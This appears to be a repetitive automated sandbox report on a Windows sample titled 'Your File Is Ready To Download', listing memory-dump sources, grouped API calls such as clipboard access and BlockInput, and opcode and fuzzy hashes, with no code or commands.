                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$BeepClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3141429382-0
                                                                                                                                                                                                                          • Opcode ID: ec1f7698742971c684fcce923c59e07ce5e671a850b3ba8c006df2acb425b72b
                                                                                                                                                                                                                          • Instruction ID: 7d649e32d9fb6d21ea2179a32977a2d4ce6375240ea52ac391409dd76d458351
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec1f7698742971c684fcce923c59e07ce5e671a850b3ba8c006df2acb425b72b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28915C31600B4086FB6B8B2BA8443EA77A2F78DBD4F544116FB5A876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTickWindow$ClipboardCloseForegroundGlobalMessagePeekTextUnlockVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1043259673-0
                                                                                                                                                                                                                          • Opcode ID: 897bb3d8117c7bc7f186c42cc8fd60b17f33fd6da02fd5b8ce4390268177136b
                                                                                                                                                                                                                          • Instruction ID: 3be0bed3be6027fe7d3f3789635846199c564c518d246570e3b72a4739cc78c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 897bb3d8117c7bc7f186c42cc8fd60b17f33fd6da02fd5b8ce4390268177136b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D914831604B4086FB6B8B27A8443EA77A2F78DBD4F544216EF5947AF6DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseEmptyGlobalMessagePeekRecycleUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2387848762-0
                                                                                                                                                                                                                          • Opcode ID: 8b89c53ab6f510f642ce9ff566a8d318d76e330f6ef9892c23bdc1f868e4ffc7
                                                                                                                                                                                                                          • Instruction ID: 30e7dd8c001efbd768e4b9709394bec6ca90854a641c2b8706f04807ca2cf74c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b89c53ab6f510f642ce9ff566a8d318d76e330f6ef9892c23bdc1f868e4ffc7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB5A87AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677732381-0
                                                                                                                                                                                                                          • Opcode ID: b6adeebde1c8d682402a109a9279e4306ad60e5876fb0eaa9a635a982790e88b
                                                                                                                                                                                                                          • Instruction ID: 3b8e36c1247a58303e6f226d53f665e908a8770f35cd4797da3ac22da9bb71ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6adeebde1c8d682402a109a9279e4306ad60e5876fb0eaa9a635a982790e88b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA814A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5A47AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677732381-0
                                                                                                                                                                                                                          • Opcode ID: 775dde92616c78ebeb5a36f7d6d8db95d522d84c17d1e49c68ab41f914c009b9
                                                                                                                                                                                                                          • Instruction ID: afa2a868ed7631c5bca4cb2bc1655b2219ae853c8539f684e42b888ef00cafb2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 775dde92616c78ebeb5a36f7d6d8db95d522d84c17d1e49c68ab41f914c009b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5A476F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseDebugGlobalMessageOutputPeekStringUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1875564215-0
                                                                                                                                                                                                                          • Opcode ID: 70f389a3415d445527e387d132d3a14c1e62a7841f17d8627a779c81c58943c5
                                                                                                                                                                                                                          • Instruction ID: e0ae428173d4036d503dae637120ca782d8a112a0ecc1bb6ecd56eaa0f72cc28
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70f389a3415d445527e387d132d3a14c1e62a7841f17d8627a779c81c58943c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74813B31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: StateThreadWindow$AttachForegroundInputProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1229699718-0
                                                                                                                                                                                                                          • Opcode ID: a2b0cc0086029fdb757a06575e5eeaf16cfcd2d264a45fe096f562736b3ee843
                                                                                                                                                                                                                          • Instruction ID: 2ad539e298d6ef03f932bc59e02795c311250da9ed8414acf218e6efff38d06e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b0cc0086029fdb757a06575e5eeaf16cfcd2d264a45fe096f562736b3ee843
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF71E2325046C0CAF76B9B36A8443E93BA1E34D799F180119FB560F6F2CB3AC885CB11
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: StateThreadWindow$AttachForegroundInputProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1229699718-0
                                                                                                                                                                                                                          • Opcode ID: 174f8e8503b4a2e05e1283a16a3c1acb478b98295829aa6f578923634267ac6a
                                                                                                                                                                                                                          • Instruction ID: 09ecf516732d50b82f019e974623479a18dad599397fcac9ebe0efdf26a8c879
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 174f8e8503b4a2e05e1283a16a3c1acb478b98295829aa6f578923634267ac6a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA71D2325046C0CAF76B9B36A8443E93BA1E35D799F184119FB560F6F2CB3AC985CB11
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _lock.LIBCMT ref: 00000001400C93D5
                                                                                                                                                                                                                            • Part of subcall function 00000001400CDC54: _amsg_exit.LIBCMT ref: 00000001400CDC7E
                                                                                                                                                                                                                          • RtlDecodePointer.NTDLL(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9408
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9426
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9466
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9480
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9490
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00000001400C951C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3411037476-0
                                                                                                                                                                                                                          • Opcode ID: d463f9a7a04f441f5f92512035965f4a65b9f0abf1ab234d91880605039d61d1
                                                                                                                                                                                                                          • Instruction ID: 494cfdddd2c0364b8ee9aee5854cb180954b453142497e3a66222978a8497a00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d463f9a7a04f441f5f92512035965f4a65b9f0abf1ab234d91880605039d61d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57417C3121AB8081FA5AAF13F8847D972A4BB8CBC4F140025FB8D47BB9EF78C4568711
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __doserrno_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 921712934-0
                                                                                                                                                                                                                          • Opcode ID: 4093a871b7decc5d353a457439ec97ba982effba3839932d5df7a13d57b19109
                                                                                                                                                                                                                          • Instruction ID: 4820451ea1fe19a347114eaaa9b8a110df9fcf6019238f63dacbabb06c65991c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4093a871b7decc5d353a457439ec97ba982effba3839932d5df7a13d57b19109
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1521057231464065F61B6F2798453ED76516BCCBE5F4A4216FF290B3F2CB788882D720
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ClassCurrentDialogDirectoryForegroundMessageNameProcessThread
                                                                                                                                                                                                                          • String ID: #32770
                                                                                                                                                                                                                          • API String ID: 2633243691-463685578
                                                                                                                                                                                                                          • Opcode ID: 66b86016b8e0ec6d327a662b3c344106b27a3a6adfda018855c6e75e934b5235
                                                                                                                                                                                                                          • Instruction ID: e10d809552e135f65f302e20a0a8a9ebce2db2749f92cb0cff84000efc484814
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b86016b8e0ec6d327a662b3c344106b27a3a6adfda018855c6e75e934b5235
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 173108B160968586FF67DF17E8543E937A0A78DBC4F480026EB0A173B4DF78D586C611
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: adc8d7f3167759a303d5bf32d572ad761c8dfa20239f91cd3868e4050556fb9e
                                                                                                                                                                                                                          • Instruction ID: 53a9499f3d9918ae4eb51fd91a74910483bae15a62386d0d910133d5dab512fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc8d7f3167759a303d5bf32d572ad761c8dfa20239f91cd3868e4050556fb9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51E18E32604B8089E7678B66E8443EA77A1FB8DBD4F544216EF9947BF5DB38D881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 7fa52b3680945060c860e7a3d66599f75cf20c9bc2079a1efab547494ec35dbe
                                                                                                                                                                                                                          • Instruction ID: 591696fce92b75d3744b1d2efe0945c4937f8228c70a6ebd845775a458278747
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fa52b3680945060c860e7a3d66599f75cf20c9bc2079a1efab547494ec35dbe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3C18E3160474086EB6B9B27E4503EA77A2BB8DBD4F544216FB5A4B7F6DB38D881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 416744ce18451341b3fbdc67a540a789ff393108833236a27645ea7bdc2c79d7
                                                                                                                                                                                                                          • Instruction ID: 6c3cf5003ee63e9b42baaa8ebd4d232ad00fd66f38ba021e0febfeb5fcaf7a93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 416744ce18451341b3fbdc67a540a789ff393108833236a27645ea7bdc2c79d7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA16C3160474086FB6B8B27E8443EA77A2E79DBD4F544116FB598BAF6DB38D881C700
                                                                                                                                                                                                                          Uniqueness

